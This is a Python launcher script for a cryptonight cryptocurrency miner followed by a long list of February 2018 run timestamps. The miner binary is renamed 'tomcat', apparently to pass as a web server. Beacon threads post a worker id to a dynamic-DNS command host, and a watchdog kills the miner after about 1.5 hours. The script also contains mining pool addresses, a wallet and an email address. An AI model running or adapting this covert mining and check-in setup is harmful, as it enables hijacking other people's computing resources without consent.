import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:04.881531
#2018-02-17 16:36:05.089691
#2018-02-17 18:23:06.886981
#2018-02-17 20:11:07.382147
#2018-02-17 21:59:07.422011
#2018-02-17 23:44:05.684655
#2018-02-18 01:34:04.094476
#2018-02-18 03:21:06.261278
#2018-02-18 05:09:07.236898
#2018-02-18 07:01:05.332057
#2018-02-18 08:50:07.026221
#2018-02-18 10:37:06.000273
#2018-02-18 12:22:05.335198
#2018-02-18 14:09:04.292252
#2018-02-18 15:59:01.331528
#2018-02-18 17:49:07.665100
#2018-02-18 19:36:01.408316
#2018-02-18 21:21:03.198259
#2018-02-18 23:09:05.942408
#2018-02-19 00:56:04.063141
#2018-02-19 02:43:03.677854
#2018-02-19 04:30:03.034676
#2018-02-19 06:15:07.375241
#2018-02-19 08:03:06.251090
#2018-02-19 09:53:06.422624
#2018-02-19 11:42:07.807093
#2018-02-19 13:29:06.499724
#2018-02-19 15:17:06.532002
#2018-02-19 17:05:03.733204
#2018-02-19 18:50:09.700154
#2018-02-19 20:41:02.167677
#2018-02-19 22:27:03.947223
#2018-02-20 00:12:08.638466
#2018-02-20 01:59:04.525342
#2018-02-20 03:49:05.179185
#2018-02-20 05:33:05.029543
#2018-02-20 07:17:07.577467
#2018-02-20 09:04:03.564285
#2018-02-20 10:46:07.836952
#2018-02-20 12:32:09.189353
#2018-02-20 14:19:07.027702
#2018-02-20 16:02:05.068545
#2018-02-20 17:49:01.730593
#2018-02-20 19:40:01.474146
#2018-02-20 21:26:03.907861
#2018-02-20 23:09:01.335627
#2018-02-21 00:52:01.295162
#2018-02-21 02:37:02.243120
#2018-02-21 04:26:05.528379
#2018-02-21 06:13:03.281228
#2018-02-21 07:58:12.295422
#2018-02-21 09:44:08.450638
#2018-02-21 11:33:03.958138
#2018-02-21 13:21:12.234100
#2018-02-21 15:06:06.442310
#2018-02-21 16:55:13.934615
#2018-02-21 18:45:09.379928
#2018-02-21 20:39:05.033795
#2018-02-21 22:24:07.216578
#2018-02-22 00:13:04.689511
#2018-02-22 02:03:05.984733
#2018-02-22 03:48:01.474003
#2018-02-22 05:35:07.674196
#2018-02-22 07:20:03.063658
#2018-02-22 09:07:05.807869
#2018-02-22 10:55:02.902695
#2018-02-22 12:41:04.016216
#2018-02-22 14:26:06.844670
#2018-02-22 16:14:09.133253
#2018-02-22 18:02:05.224678
#2018-02-22 19:52:01.964521
#2018-02-22 21:42:05.941459
#2018-02-22 23:29:05.737952
#2018-02-23 01:17:01.717234
#2018-02-23 03:05:07.444386
#2018-02-23 04:53:01.311478
#2018-02-23 06:37:07.014057
#2018-02-23 08:26:06.742784
#2018-02-23 10:42:01.640763
#2018-02-23 12:36:04.303823
#2018-02-23 14:21:11.502456
#2018-02-23 16:13:07.932913
#2018-02-23 17:58:04.107839
#2018-02-23 19:43:04.074973
#2018-02-23 21:27:04.530262
#2018-02-23 23:14:01.975484
#2018-02-24 01:04:04.384180
#2018-02-24 02:56:07.566539
#2018-02-24 04:44:05.770372
#2018-02-24 06:28:05.260124
#2018-02-24 08:17:04.948925
#2018-02-24 10:02:05.002218
#2018-02-24 11:59:05.568256
#2018-02-24 13:47:03.536990
#2018-02-24 15:34:04.967157
#2018-02-24 17:29:05.935623
#2018-02-24 19:16:03.644829
#2018-02-24 21:03:03.468228
#2018-02-24 23:36:07.321278
#2018-02-25 02:57:04.782019
#2018-02-25 06:58:06.688969